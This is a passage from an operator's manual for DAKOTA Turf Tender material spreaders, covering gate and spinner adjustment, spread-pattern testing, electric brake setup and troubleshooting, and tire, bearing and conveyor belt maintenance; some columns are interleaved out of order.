heavy topdressing and core filling, the gate may have to be open 4-5 inches (10-12 cm). The operating speed also affects the amount of material you are dispensing. If accurate calibration of material delivery rates is required, the actual gate opening should be determined using the following steps: 1. Make sure the conveyor belt is properly tensioned. Refer to belt adjustment in the Maintenance section. 2. Press down firmly on the gate so it depresses the belt as far as it will go; then lock in place with the hand screws. It requires about 40 to 50 pounds of force to set the metering gate in the fully closed position. This must be done since the belt drops slightly below the gate opening when material is in the hopper. Make sure the gate appears level. 3. Using a ball point pen, draw a line on the back wall of the hopper across the top of the metering gate. This is your “zero” gate opening reference line. 4. On both the right and left ends of the reference line, draw a scale (fractional inches or millimeters) going up from the line for an exact gate opening reference. NOTE: When the metering gate is set to its “zero” position, material will still flow out the Turf Tender conveyor when the conveyor is in operation. The belt cups will actually allow about an 1/8 inch layer of material to come out the metering gate. The metering gate is secured by the two turn-screws, one on each side. To adjust gate height, loosen the two turn-screws, adjust to the proper height (either by hand or by using the hand crank), and tighten the turn-screws to secure the adjustment. Depending upon the material being applied, the gate may be left open 1-3 inches (2.5-7.5 cm) even when transporting materials. Sand and other large aggregate type materials will not flow out at these openings under normal conditions. Finer materials such as grass seed may tend to flow out even when the gate is open a small amount. FRONT GATE The electric front gate function adds both safety and convenience to the operation of the machine. The tractor operator can open and close the gate from the seat of the tractor so no one needs to get close to the machine when it is working. That also means that only one operator is required. The electric front gate is easy to operate. One switch moves the gate either up or down. Push the switch away from the tractor operator and hold to open the gate. Pull the switch toward the operator and hold to close the gate. Releasing the switch will stop the gate at whatever position it is in. The purpose of the front gate is control material flow out the front of the Turf Tender. Material may be unloaded directly in front of the machine or to the side using the side conveyor in the operating position. Depending on the material being hauled, the front gate may be left open a small amount. Because of the relative position of the gate opening to the end of the main conveyor, many materials will not leak out if the gate is left open 1-2 inches. If you plan to leave the gate open, monitor it while you are filling the hopper to see if you will have a problem. Always close the gate to the position you need before filling hopper. Trying to force the gate closed when the hopper is full may damage the gate or the front of the hopper. Keep the gate clean and keep the track free of debris. This limits excessive wear and potential damage from the gate jamming on the debris. OPERATION 21 ELECTRIC VIBRATOR An electric vibrator is an option available for all Turf Tender models. The vibrator is designed to help break up material bridging problems in the hopper. As the main conveyor belt pulls material out of the bottom of the hopper, some material (i.e. wet sticky sand) can bridge or form a hollow tunnel through the bottom of the hopper. The vibrations from the electric vibrator will normally shake the material loose so that it will drop onto the conveyor belt. For all models (except the self-contained models), the master switch must be turned to the ON position to allow all other controls to function. The red light will be illuminated when the master switch has energized the rest of the control box functions. NOTE: To prevent battery discharge, remember to turn the master switch to the OFF position when not using the Turf Tender. Activate the vibrator using the vibrator switch on the control box. Sometimes 2 or 3 short bursts are needed to break the material loose. The switch is a momentary switch and should never be held in the ON position for extended periods of time. CAUTION Do not operate the vibrator continually as excessive wear on the motor will result. Excessive compaction of material in the hopper can also result making it much more difficult to unload. DUAL SPINNER SYSTEM The dual spinner function of all Turf Tenders is the same. A variety of materials from sand and larger aggregates down to grass seed and fertilizer may be spread. Coverage widths may be as wide as 50 feet (15 m). It should be noted that “fine tuning” the system for the specific material being spread is essential. CAUTION Always turn the spinners on before starting the main conveyor. Failure to due so will result in material piling up on the spinners. Material discharged from the spinners can be very dangerous; therefore no other people should be near the Turf Tender when spreading and the operator should remain in the tractor’s seat while the tractor is running. The velocity of discharged material can exceed 60 miles per hour. Electric-Control Models The switch on the control box marked “spinner” controls the On/Off function of the hydraulic valve. The spinner speed dial controls the speed of the spinners. The numbers on the dial’s scale do not represent any particular units, they are simply reference numbers to allow you to set the sinner speed the same each time. The relationship between spinner speed and dial scale are fairly linear; therefore, if the dial was initially set at 40, raising the setting to 80 would roughly double spinner speed. Operation The dual spinner system is very easy to operate. The “spinner” switch on the control box activates the spinners. Most operators leave the spinners on at all times while spreading a load and only turn the spinners off when the hopper is empty. The conveyor should be turned ON as you start a pass and OFF as you complete the pass and turn around. 22 OPERATION Manual-Control Models On the manual-control system, spinner speed adjustments are made on the valve located on the right side of the Turf Tender. The speed of the spinners. To adjust the spinner speed on your manualcontrol system, use the following procedure: 1. Operator sets parking brake. 2. Operator shuts off engine. 3. Operator dismounts and adjusts flow. 4. Operator returns to tractor and starts engine. 5. Operator tests Turf Tender using new setting. 6. Operator repeats process as often as necessary to get correct flow and correct speed. CAUTION Use care and firmly support the spinner when removing and installing. Also, be sure the spinner is firmly locked on the shaft. Adjustments OVERVIEW A variety of materials from sand and larger aggregates down to grass seed and fertilizer can be spread with Turf Tenders. All Turf Tenders use the same spinner disk assemblies. The 410 Turf Tender models use smaller hydraulic motors and is designed for light and heavy topdressing, seeding, and fertilizer applications. All other Turf Tender models are designed for light to heavy application rates and use larger hydraulic motors. Coverage can be as wide as 50 feet (15 m). It should be noted that “fine tuning” the system for the specific material being spread is essential. The information presented here represents thousands of hours of design and testing, as well as feedback from people like you, SPINNER ASSEMBLY the users of our products. Please read this information thoroughly to ensure that you have an understanding of it’s Installation And Use The spinner shafts are made of stainless steel to reduce content. the chance of corrosion. Applying Anti-Seize (a special type Different materials require different spread patterns. of grease) is recommended to facilitate greater corrosion DAKOTA offers three (3) different colored spinners so you resistance. Each time a spinner is removed or installed, apply can have multiple sets with each set adjusted for a specific Anti-Seize to the entire spinner shaft. material. All sets have black blades. Suggested uses of the Each spinner is secured by a swift detach button (just like different colored disks are: a power take off (PTO) shaft), so it can be removed and 1. White spinner disks for sand (included with the Turf Tender). installed quickly. To remove and install a spinner, support 2. Black spinner disks for spreading fertilizer. the spinner; then press inward on the button to release the 3. Green spinners disks for grass seed. spinner from the shaft. Slide the spinner off the shaft. Apply Anti-Seize to the shaft; then slide the spinner onto the shaft. The stock set could be used for all materials if you take Press the button inward and continue to slide the spinner onto the time to adjust them for each material. Contact a DAKOTA the shaft until the button pops back to the lock position. Make dealer for additional spinner disks. sure the button pops completely out to lock the spinner on BLADE ADJUSTMENTS the shaft. Push and pull the spinner up and down on the shaft The following figure shows a white right-side spinner disk to make sure it is secure. with black blades as assembled at the factory. Different application rates and types of material may warrant changing the blades from their “neutral” position. Also, gate opening, spinner speed, and conveyor speed will affect the pattern. In general for best application of material, avoid running the conveyor too slowly and avoid running the spinners too fast. The factory “neutral” setting was designed to yield the best spread pattern under the following conditions: Material: moist sand (barely clumps when hand squeezed) Gate Opening: 3/4 in. (from the flat of the belt) Conveyor Speed: 70 RPM (about 70% dial setting) Spinner Speed: 350 RPM (about 65% dial setting) OPERATION 23 The following illustration represents how three blades may be set to hold the material a little longer and three other blades are set to release material a little sooner. An overview on pattern distributions and blade settings follows. NOTE: Do not be too concerned about achieving the maximum spread width; instead, focus on getting a good distribution of your spread pattern. The “neutral” blade setting, points the blades at the center of the spinner shaft. There is a diamond cut in the spinner disk indicating the “neutral” position bolt hole for each blade. SPREAD PATTERNS AND ADJUSTMENTS Overview WARNING All spinner blade fasteners must be tightened after each adjustment. Failure to do so could result in injury or even death. WARNING The setting the spinner and conveyor speeds on some models, requires the use of a hand-held tachometer. Remove the spinners prior to measuring the spinner rpm. Failure to do so could result is serious injury or even death. NOTE: Conveyor speed indicators are either located on the control box or on the left side of the Turf Tender. 24 Spread pattern is defined as the uniformity of material distribution. Calibration refers to controlling the amount of material deposited over a set area. Prior to setting up the Turf Tender for calibration, the following items must be correct: A. The conveyor belt rear roller must be positioned 5 1/4 in. (13.3 cm) from back wall of vertical chute. NOTE: This is measured from the flat portion of the belt. B. The conveyor belt must be properly aligned and tensioned. If adjustment is necessary, make the necessary adjustments at the front end of Turf Tender. C. On trailer-type models, all tires must be properly inflated. Adjust tire inflation pressure so all tires are equal and suitably low to avoid excessive soil compaction. The recommended tire pressure operating range is 13-18 psi (90-124 kPa) for 26.5 in. tires and 15-22 psi (115-169) for 33 in. tires. Remember, the inflation pressure of the tire indicates how much compaction you are imparting on your soil. Running the tire pressure too low may however cause damage to the tire. D. The spinner shafts must be vertical. If necessary, on trailertype models, make the initial adjustment by changing the hitch height. If unable to bring the spinner shafts fully vertical by changing the hitch height, it may be necessary to adjust the spinner assembly until the spinner shafts are vertical. OPERATION E. The hopper wipers must be adjusted tightly down onto the conveyor belt. Failure to properly adjust the hopper wipers results in an adverse spread pattern and application rate. Adjust the hopper wipers by pushing the belt fully downward; then adjust the wipers tightly down to the belt and secure the adjustment. F. Set the metering gate opening to the approximate material flow rate. Do not open the gate too far. Instead travel slower over the area to get a higher application rate. Opening the gate too high affects the controllability of the pattern. For most materials, 3-4 inches (7.6-10 cm) seems to be the point at which pattern controllability problems arise. Available hydraulic power from the tractor may also be a limiting factor in your gate setting. G. Calibrate spinner speed to 325-350 RPM. Extensive testing has shown that excessive spinner speed results in uncontrollable patterns, material hitting the spinner shield and heavy material deposits in the center. Furthermore, increasing the spinner speed to 500 RPM, increases your spread pattern width by only 10-15 feet (3-5 m) and results in segregation of particulates such that fine ones only go a few feet and the larger ones travel to the outer region of the pattern. This causes detrimental results with precision topdressing and fertilizer application. Basic Spinner Adjustments If the spread pattern is heavy in the middle, adjust three of the six blades (every other one) on each spinner disk two notches in the hold direction; then test the spread pattern. If necessary, move the same blades two more notches in the hold position. If additional adjustments are desired, move the remaining three blades (that haven’t been adjusted) two notches in the hold direction. If the spread pattern is heavy on the outside, adjust three of the six blades (every other one) on each spinner disk two notches in the release direction; then test the spread pattern. If necessary, move the same blades two more notches in the release position. If additional adjustments are desired, move the remaining three blades (that haven’t been adjusted) two notches in the release direction. The following photo illustrates the hold and release angles for a right spinner disk which rotates counterclockwise. Collection Methods H. Calibrate conveyor speed to approximately 70 RPM. This will result in material just “skimming” the back wall of the vertical spinner chute. The placement location of material on the spinners has proven to be a critical variable in the adjustment and control of the spread pattern. I. Take note of the material type, condition, and supplier. Material, which has varying moisture and/or clay content from one week to the next, may behave differently each time you spread it. Wet sand, with high clay content, is among the hardest materials to spread. For these reasons, try to maintain uniform material conditions. Sometimes it’s as simple as talking with your supplier to arrange for uniform material to be supplied and covering the material pile with a tarp so it is not exposed to the elements. In direct contrast, dry graded silica sand (hour glass sand) is probably the easiest material to spread. The establishment of these preliminary setup steps was developed through extensive testing and experience. For example, the conveyor belt’s rear roller distance of 5 1/4 in. (13.3 cm) from the back wall of the vertical spinner chute was found to give the best control of spread pattern distribution with all of the various spinner blades. This applies to all models. STANDARD PAN COLLECTION METHOD The typical method of testing the spread pattern is to place collection pans in a row going across the direction of travel. Make one or more passes across the pans and measure the amount of material in each. This doesn’t work with large broadcast spreaders. The amount of material collected in each pan can be graphed to reveal the type of spread pattern you are producing. A perfect rectangular pattern is very hard to achieve and, in some cases such as fertilizer application, not desirable because you would have to drive impossibly precise to avoid skips or double application. The inherent limitation of this testing method is that particles coming out of a broadcast spreader have a very low trajectory angle with high velocity and usually skip across the surface. Most test runs will have sand sliding across the pan and launching out the opposite side. We have even tried using square “egg crate” inserts of varying sizes to provide better capture of material but we still had material skipping across the top. Therefore, the industry-standard pan collection method does not accurately reflect the true distribution of material. OPERATION 25 STATIONARY TESTING METHOD Although there are no references to doing this in industry, we have found that it is best to run several stationary tests of the system to quickly find the operational settings of the spinner blades. By spreading material in an empty parking lot or another area having a paved surface, you will be able to quickly clean up the discharged material for reuse as well as be able to observe the uniformity of the spread pattern. Record the general qualitative characteristics for pattern uniformity and wraparound (spreading ahead and/or to the sides of the Turf Tender’s wheels). We found that, initially, we needed to spread material from the stationary position and, when done spreading, push the material into a narrow row (long pile), running across the spread area. Looking at the amount of material in the strip-pile is a pretty good indicator of the distribution pattern. After a short period of time you will be able to look at the distribution (where it dropped) to determine how uniform the pattern is and eliminate the need to pile up the material in a row. As an example of the differences between the two test methods’ results, we found that when we had an obvious W spread pattern (heavy center and outside edges) using the stationary testing method, the pan method was indicating that we had a nearly perfect distribution. The problem is that the pan method did not accurately reflect where the material was actually deposited after it had hit the ground, bounced, rolled, and stopped. Pattern Adjustments The pattern below shows the optimum distribution of material behind the spreader from one pass. On the next pass, the operator should drive at the edge of the pattern, which overlaps material to the center of the previous pass. This results in a uniform distribution of material across the ground. Most importantly, errors in driving cause minimal streaking from double spreading or gaps. The problem is that it is very hard to attain this pattern with broadcast spreaders. Some spreader manufacturers or users prefer to have a pattern like the following figure. This can give good results but requires more precise driving to achieve the exact interval needed. The pattern must be tested with pans to determine the point half way from the edge to the corner. Then the driving interval must be maintained or gaps and overspreading result. 26 The rectangular pattern is best for sand and requires perfect driving to avoid gaps and overspreading. It is not recommended. The oval or rounded pattern is common to many spreaders and can yield good results similar to the trapezoidal pattern. The same discussion applies. To get it close to a pyramidal pattern, increase the amount of release angle on the blades. This should cause more material to fall directly behind the spreader. Also, reducing the amount of hold angle should yield the same result. The following pattern results from excessive hold angle. Too much material is staying on the blades too long. Reduce the hold angle and change half the blades to a release angle. This pattern may also be caused by too much hold on half the blades. The heavy center may indicate excessively high spinner speeds. From a safe distance, watch how material is exiting the center of the spinners. If a lot of material is coming off each spinner in the center after hitting the shield and crossing over the center, the spinner speed is too fast. This is due to material bouncing off the blades of the spinners rather than siding along the blade. On the other hand, if the material streams crossing from each side are colliding and dropping straight down, the blades need to hold material a little longer. If there is little crossing of material at the center, reduce the hold angle to bring the edge humps toward the center. OPERATION ELECTRIC BRAKES Overview Most trailer-type Turf Tenders come equipped with electric brakes. tow vehicle. APPLICATION RATES Overview Application rate refers to the amount of material spread over a given area. Often it’s referred to pounds per acre or 1000 square feet. To Achieve a Higher Application Rate: 1. Slow down the ground speed. This is the best option since your spread pattern will not be affected. 2. Increase the rear gate opening. Doing this may affect your spread pattern. 3. Decrease spinner speed (spread pattern width); then decrease the driving interval (overlap). This may also change the uniformity of spread. To Achieve a Lower Application Rate: 1. Increase ground speed. This is the best option since your spread pattern will not affected. 2. Decrease the rear gate opening. 3. Increase the spinner speed; then decrease the driving interval (overlap). Again, numbers 2 and 3 may affect the spread pattern. Spread Calculator To download our “Spread Calculator” containing information regarding application rates, please go to: Basics Of Operation The electric brakes on the Turf Tender are similar to the drum brakes on an automobile. The difference is that automotive brakes are actuated by hydraulic pressure while electric brakes are actuated by an electromagnet. Electric brakes operate in the following manner: 1. When the electrical current is fed into the system by the controller, it flows through the electromagnets in the brakes. 2. The electromagnets are energized and are attracted to the rotating armature surface of the drums which moves the actuating levers in the direction that the drums are turning. 3. The resulting force causes the actuating cam block at the shoe end of the lever to push the primary shoe out against the inside surface of the brake drum. 4. The force generated by the primary shoe acting through the adjuster link then moves the secondary shoe out into contact with the brake drum. 5. As the current flow to the electromagnet is increased, it causes the magnet to grip the armature surface of the brake drum more firmly. This results in an increased pressure against the shoes and brake drums. CAUTION The Turf Tender will not have the correct amperage flow to the brake magnets to give you comfortable, safe braking unless the proper brake system adjustments have been made. OPERATION 27 Varying load and driving conditions as well as uneven alternator and battery output can mean unstable current flow to your brake magnets. Therefore, it is imperative that a properly modulated brake controller be used and the brakes be maintained and adjusted according to the information in this manual. BRAKE CONTROLLER ADJUSTMENT WARNING Before making road tests, make sure the area is clear of vehicular and pedestrian traffic. It is important that the brake controller provide approximately 2 volts to the braking system when the brake switch is first activated. The longer the brake switch is held in the ON position (either left or right of center), the voltage to the brakes gradually increases up to a maximum of 12 volts. If the controller voltage jumps immediately to a high voltage output, even during a gradual stop, then the electric brakes will always be fully energized during brake activation and will result in harsh braking and potential wheel lockup. Proper brake system setup adjustments can only be accomplished by road testing. Brake lockup, grabbiness, or harshness is quite often due to: 1. Improper setup of the Turf Tender. 2. Too high of a threshold voltage (over 2 volts). 3. Under adjusted brakes. Before any brake setup adjustments are made (in the brake control box on the right side of the Turf Tender), the Turf Tender brake drums should be burnished-in by applying the brakes 20-30 times at 15 mph and coming to almost a complete stop. Allow ample time for brakes to cool between each application. This allows the brake shoes and magnets to slightly “wear-in” to the drum surfaces. Operating the Electric Brake The top switch on the left side of Turf Tender control box controls the activation of the brakes. It is a three position switch with the center position being the OFF position. Turning the switch either to the left or right, activates the brakes. The longer the switch is held in an ON position, the more pressure the brakes exert. Only hold the switch in the ON position until adequate braking is attained. NOTE: Holding the switch in an ON position gradually increases the voltage (stopping power) of the brakes. 28 Tow the Turf Tender at slow speed (approximately 8 mph) on a hard, level, and dry road surface. Activate the brake switch and hold for a few seconds; then release. If the brakes lock up, remove the brake control box cover on the right side of the Turf Tender and back the GAIN knob off slightly. If the brakes are weak, turn the GAIN knob up until the brakes don’t quite lock up. Repeat the procedure until the brakes operate properly. Place the cover back into position and secure. WARNING Gain should be turned down in wet or slippery conditions. Gain should never be set to a level high enough to cause the brakes to lock up. Skidding wheels can cause loss of directional stability of the Turf Tender and tractor possibly resulting in injury or even death. The GAIN control may need to be reset to adjust for different load weights and terrain conditions. Braking performance may be sluggish in subfreezing temperatures. In subfreezing temperatures, allow adequate time for the control to warm up prior to use. OPERATION MAINTENANCE WARNING After all repairs and/or adjustments, always test the Turf Tender before operating. Failure to do may result in injury or even death. RUNNING GEAR (TRAILER-TYPE MODELS) Wheels There is very little chance of a problem with your wheels unless you are driving on a flat tire or if the wheel bolts have loosened. If a problem should develop with a wheel, remove it; then repair or replace as needed. Axles Larger models of the Turf Tender have two (2) wheels on each side of the Turf Tender that are attached to independent “walking beam” axles. Smaller Turf Tender models have a single, solid axle on each side. The axles, if maintained properly, will give many years of service. WARNING Tire and wheel mounting and demounting can be dangerous and must only be done by trained personnel using proper tools and procedures. Failure to comply with safety procedures and information contained here can result in serious injury or even death. Tires The tires on the Turf Tender are designed to provide good flotation (less compaction) under normal circumstances. It is important to check tire pressure on all tires periodically to ensure they are properly inflated. Proper inflation will extend wear and provide good flotation. The recommended tire pressure operating range is 13-18 psi (90-124 kPa) for 26.5 in. tires and 15-22 psi (115-169) for 33 in. tires. Do not exceed the maximum tire pressure listed. WARNING Operation of the Turf Tender with improperly inflated tires could result in serious injury or even death due to the potential rollover under certain conditions such as operating on a hillside. wheel bolts; then remove the wheel. 5. Bring the wheel to a tire repair center to fix or replace the tire. NOTE: Due to the specialized equipment necessary, tire removal, repair, and mounting should be only performed by a tire repair service shop. 6. Place the wheel back into position; then install the wheel bolts. Tighten until snug. NOTE: Do not lubricate threads. 7. Using a crisscross pattern, tightening wheel bolts to 90 ft-lb (12.4 kg-m). CAUTION Do not under or over torque the wheel bolts. Inappropriate wheel bolt torque will result in wheels loosening and possibly falling off. 8. Remove the jack stands from beneath the Turf Tender; then lower the jack. CHANGING AN OUTSIDE TIRE 1. Empty all material from the hopper; then chock the wheel(s) on the opposite side of the Turf Tender. 2. With the Turf Tender hooked to a tractor that has the parking brake set, jack up the frame directly in front of the axle mount. NOTE: Wheel bolt torque must be checked every 10 hours after mounting a wheel until the bolts maintain the proper torque. CHANGING AN INSIDE TIRE (4-WHEEL MODELS) Changing an inside tire is slightly more complicated than changing an outside tire since it involves removing the “walking beam” axle assembly and rolling it out from beneath the Turf Tender. 1. Empty all material from the hopper; then chock the wheel(s) on the opposite side of the Turf Tender. 2. With the Turf Tender hooked to a tractor that has the parking brake set, jack up the frame directly in front of the axle mount. MAINTENANCE 29 The walking beam axles need regular greasing maintenance. There are grease points on the front and rear of each axle assembly. General lithium grease may be used for a lubricant. See the lubrication schedule for proper lubrication application. walking beam axle mounting bolts and nuts (front & rear). Roll axle assembly out to the rear. 5. Stand the axle assembly on end and remove the wheel bolts; then remove the wheel. 6. Bring the wheel to a tire repair center to fix or replace the tire. NOTE: Due to the specialized equipment necessary, tire removal, repair, and mounting should be only performed by a tire repair service shop. 7. Place the wheel back into position; then install the wheel bolts. Tighten until snug. NOTE: Do not lubricate threads. 8. Using a crisscross pattern, tightening wheel bolts to 90 ft-lb (12.4 kg-m). Wheel Bearings The wheel bearings should be repacked with grease and the seals inspected annually under normal use and conditions. This procedure should be done more often if you are using the Turf Tender every day or if working with extremely abrasive materials or fertilizers. NOTE: For Turf Tender models with only one wheel on each side, ignore the steps referencing the walking beam axles. 1. Empty all material from the hopper; then chock the wheel(s) on the opposite side of the Turf Tender. 2. With the Turf Tender hooked to a tractor that has the parking brake set, jack up the frame directly in front of the axle mount. CAUTION Do not under or over torque the wheel bolts. Inappropriate wheel bolt torque will result in wheels loosening and possibly falling off. 9. Roll the axle assembly back under the Turf Tender and install the eight bolts and nuts securing it to the frame. Tighten the hardware to 75 ft-lb (10.3 kg-m). 10. Remove the jack stands from beneath the Turf Tender; then lower the jack. NOTE: Wheel bolt torque must be checked every 10 hours after mounting a wheel until the bolts maintain the proper torque. Axle Lubrication Larger Turf Tender models come equipped with 2 independent walking beam axles. These axles allow the Turf Tender to follow the contour of the ground better giving you more stability and less chance of damaging turf. 30 3. Using jack stands, support the frame so it is safe to work beneath. Under no conditions should cement blocks (cinder blocks) or unstable piles of wood blocks be used. MAINTENANCE WARNING Do not perform maintenance of any kind below the Turf Tender unless it is properly secured and stabilized. 4. Remove the eight walking beam axle mounting bolts and nuts (four at the front and four at the rear). Roll axle assembly out to the rear. 5. Stand the axle assembly on end and remove the wheel bolts; then remove the wheels. 6. For each wheel bearing, remove the grease cap. 7. Bend the cotter key straight and remove; then remove the spindle nut and washer. 8. Remove the hub from the spindle being careful not to allow the outer bearing to fall out. The inner bearing will be retained by the seal on the back side of the hub assembly. NOTE: It is important to protect the wheel bearing bores (inside portion of the hub) from metallic chips and contamination. Ensure the wheel bearing cavities are clean and free of contamination before installing the bearings and seal. 9. Using a suitable solvent, wash all grease and oil from the bearings. Dry the bearing with a clean, lint-free cloth; then thoroughly inspect each bearing. If any pitting, spalling, or corrosion is present, the bearing must be replaced. NOTE: Bearings must always be replaced in sets of inner and outer bearings. 10. Inspect the seal to assure that it is not nicked or torn and is still capable of sealing the bearing cavity. 11. Pack the bearings with a Lithium complex NLGI No. 2 grease. 12. Assemble the hub (seal, bearings, spindle washer, and spindle nut) back on the spindle being careful to not spill grease on the outside of the spindle (backside) where it could drop onto the brakes. 13. Rotate the hub assembly slowly while tightening the spindle nut to approximately 50 ft-lb (7 kg-m); then loosen the spindle nut to remove the torque. Without rotating the hub, finger tighten the spindle nut until just snug. Back the spindle nut out slightly until the first castellation (slot) lines up with the cotter key hole and insert the cotter key. Spread the legs of the cotter key. NOTE: The nut should move freely with the only restraint being the cotter key. 14. Install the spindle cap. 15. Install the wheels; then install the axle assembly. Refer to the “Changing an Inside Tire” section for the procedure and proper torque specifications. Testing the Brake Controller To perform a quick and easy test on the brake control, use a 12-volt test light (not a voltmeter) and the following procedure: 1. Connect the ground clip from the test light to a solid ground (WHITE wire) and pierce the brake wire (BLUE wire) with the point of the test light. 2. Activate the brake switch and hold. The test light should get steadily brighter in intensity. Release the brake switch and the test light should go out. This test allows you to quickly see if the brake controller is functioning properly. If the controller tests good with a test light, but will not work properly with a Turf Tender connected, check for a poor connection or broken wire. NOTE: Minimum vehicle stopping distances are achieved when the wheels approach lockup. Brake lockup should be avoided as it results in poor vehicle stability and control. Depending upon load, driving surface, wheels and tires, not all brakes are capable of wheel lockup under all conditions. WARNING Do not adjust the controller outside the parameters outlined in these instructions. General Maintenance BRAKE ADJUSTMENT Brakes should be adjusted: after the first 10 hours of operation when the brake shoes and drums have “seated,” at 300 hour intervals thereafter, and as use and performance requires. To adjust the brakes, use the following procedure: 1. Empty all material from the hopper; then chock the wheel(s) on the opposite side of the Turf Tender. 2. With the Turf Tender hooked to a tractor that has the parking brake set, jack up the frame directly in front of the axle mount. Check that the wheel and drum rotates freely. ELECTRIC BRAKES Features tractor.. MAINTENANCE 31 CAUTION Do not lift or support the Turf Tender on any part of the axle or the suspension system. All lifting and support must be done on the frame directly in front of the axle mount point. 4. Remove the cover from the adjusting slot on the bottom of the brake backing plate. 5. Using a screwdriver or standard brake adjusting tool, rotate the starwheel of the adjuster assembly to expand the brake shoes. Adjust the brake shoes out until the pressure of the linings against the drum makes the wheel very difficult to turn. 6. Rotate the starwheel in the opposite direction until the wheel turns freely with a slight lining drag. 7. Install the cover and lower the wheel to the ground. Repeat procedure on all brakes. BRAKE CLEANING AND INSPECTION The brakes must be inspected and serviced at yearly intervals (more often as use and performance requires). Magnets and shoes must be changed when they become worn or scored thereby preventing adequate braking. Be sure to clean the backing plate, magnet arm, magnet, and brake shoes. Make certain that all the parts removed are installed in the same brake and drum assembly. Inspect the magnet arm for any loose or worn parts. Check shoe return springs, hold down springs, and adjuster springs for stretch or deformation; replace if required. BRAKE LUBRICATION Before assembling, apply a light film of Lubriplate or AntiSeize. CAUTION Do not get grease or oil on the brake linings, drums, or magnets. MAGNETS The electric brakes are equipped with high quality electromagnets that are designed to provide the proper input force and friction characteristics. The magnets should be inspected and replaced if worn unevenly or abnormally. Check the magnets for wear using a straightedge. 32 Even if wear is normal as indicated by your straightedge, the magnets should be replaced if any part of the magnet coil has become visible through the friction material facing of the magnet. NOTE: It is recommended that the drum armature surface be re-faced when replacing magnets. Magnets should be replaced in pairs - both outer sets and/ or both inner sets. Use only genuine DAKOTA replacement parts when replacing the magnets. SHOES AND LININGS A visual inspection of your brake linings will indicate if they are in need of replacement. Replacement is necessary if the lining is worn to 1/16 in. (1.5 mm) or less, contaminated with grease or oil, or abnormally scored or gouged. Hairline heat cracks are normal in bonded linings and is not a cause for concern. To retain the “balance” of your brakes, it is important to replace both shoes on each brake and both brakes of the same set (inner and/or outer). Troubleshooting Most electric brake malfunctions that cannot be corrected by either brake or controller adjustments, can generally be traced to electrical system failure. Mechanical causes are ordinarily obvious, i.e. bent or broken parts, worn out linings or magnets, seized lever arms or shoes, scored drums, loose parts, etc. A voltmeter and ammeter are essential tools for proper troubleshooting of electric brakes. MEASURING VOLTAGE Brake system voltage is measured at the magnets by connecting the voltmeter to the two magnet lead wires at any brake. This is accomplished using pin probes inserted through the insulation of the wires dropping down from the chassis. The engine of the towing vehicle should be running when checking the voltage so that low battery voltage will not adversely affect the readings. Voltage in the brake system is designed to modulate (begin at 0 volts and, as the brake switch is held in the ON position, gradually increase [modulate] to about 12 volts). If no modulation occurs (immediate high voltage applied to the brakes just when the controller begins to apply voltage), adjust and/or troubleshoot the brake system. The threshold voltage of the controller is the voltage applied to the brakes when the controller is first applied. The lower the threshold voltage, the smoother the brakes will operate. Too high of a threshold voltage (in excess of 2 volts as quite often found in heavy duty controllers) can cause grabby, harsh brakes. MAINTENANCE MEASURING AMPERAGE System amperage is the amperage being drawn by all brakes on the Turf Tender. The engine of the towing vehicle should be running when checking amperage. Measure system amperage at the BLUE controller wire (the output to the brakes). The BLUE wire must first be disconnected and the ammeter put in series into the line. Make sure the ammeter has sufficient capacity to handle the current draw of about 6 amps. To prevent damaging the ammeter, be sure to observe polarity. Individual amperage draw can be measured by inserting the ammeter in the line at the magnet you want to check. Disconnect one of the magnet lead wire connectors and attach the ammeter between the two wires. Make sure that the wires are properly connected and sealed after the testing is completed. HOPPER CONVEYOR BELT Belt Adjustment Due to stretching of the belting material with use, it will be necessary to periodically tighten the conveyor belt. Pressure on the belt and warm temperatures will increase the frequency of belt tightening. The belt should be loosened if the Turf Tender will not be used for an extended period of time or will be moving to a colder operating temperature due to seasonal or geographic changes. NOTE: If the belt was loosened for storage or any other reason, the belt will need to be tightened before using the Turf Tender. CAUTION Always tighten the belt at the front roller. Adjusting the rear roller will affect the material placement on the twin spinners and may affect belt tracking. To tighten the main conveyor belt, use the following procedure: 1. On drive motor side of the Turf Tender, loosen the two nuts securing the drive motor mount to the hopper frame. 2. Loosen the jam nut on each of the tensioning bolts. By far, the most common electrical problem is either low or no voltage and amperage at the brakes. Common causes of this condition are: 1. Poor electrical connections 2. Open circuit(s) 3. Insufficient wire size 4. Broken wires 5. Damaged circuit breaker (use of a fuse is not recommended). 6. Improperly functioning switch, controller, or resistors Another brake system electrical problem may be shorted or partially shorted circuits (indicated by abnormally high system amperage). These are occasionally the most difficult 3. Using a ¾ inch wrench, turn each tensioning bolt clockwise 1-2 complete turns. Be sure to make equal to find. Possible causes are: adjustments on both sides. 1. Shorted magnet coils 2. Defective controller NOTE: Failure to adjust the belt equally on both 3. Bare wires contacting a grounded object sides could result in improper belt alignment and Finding a short in the wiring system is a matter of isolation. damage to the belt. If the belt doesn’t stay on track, If the high amperage reading drops to zero by unplugging the the belt may not be tightened equally on both sides. wiring harness, the short is in the Turf Tender. If the amperage 4. Test the belt to see if it is properly tensioned. reading remains high with all the brake magnets disconnected, 5. When the belt is properly tensioned, secure the adjustment the short is in the wiring leading to the Turf Tender. by tightening the two jam nuts against the frame and the two drive motor mount nuts. All electrical troubleshooting procedures should start at the control box switch and then to the controller. Most problems 6. Run the conveyor to make sure belt doesn’t slip and remains running on track. regarding brake harshness or malfunctions are traceable to improperly adjusted or non-functioning controllers. See the WARNING controller information for proper adjustment and testing Do not attempt to tighten the conveyor belt when procedures previously discussed. If the voltage and amperage are not satisfactory, proceed to the connector and then to the the tractor is running or with the Turf Tender individual magnets to isolate the problem source. 12 volts output operating. at the controller should equate to 10.5 volts minimum at each magnet. Nominal system amperage at 12 volts with magnets at normal operating temperatures (i.e. not cold and controller at maximum gain) should be about 6 amps with full braking force applied. MAINTENANCE 33 Belt Replacement SPLICED BELT If it becomes necessary to replace the spliced main conveyor belt, use the following procedure: NOTE: DAKOTA sells replacement kits composed of a spliced belt and wire splice pin. The splice pin connects the two halves of the splice. 1. Run the conveyor until the belt splice is close to the front of the Turf Tender; then shut the vehicle’s engine off. WARNING Make sure the vehicle’s engine is not running before starting the belt replacement procedure. 2. Loosen the jam nut securing each of the four belt tensioning bolts (on both sides, front and rear). 3. On drive motor side (front and back) of the Turf Tender, loosen the two nuts securing the drive motor mount to the hopper frame. 4. Loosen the four belt tensioning bolts (one on each side of both the front and rear rollers). Make sure you loosen each tensioning bolt the same number of turns. 5. Rotate the loose belt until the splice is at the front of the Turf Tender. 6. Uncrimp or cut off the end of the belt splice securing the hinge pin. 7. Using a steel rod, drive or push the hinge pin out of the splice. The steel rod must be long enough to reach across the entire belt. NOTE: Once the 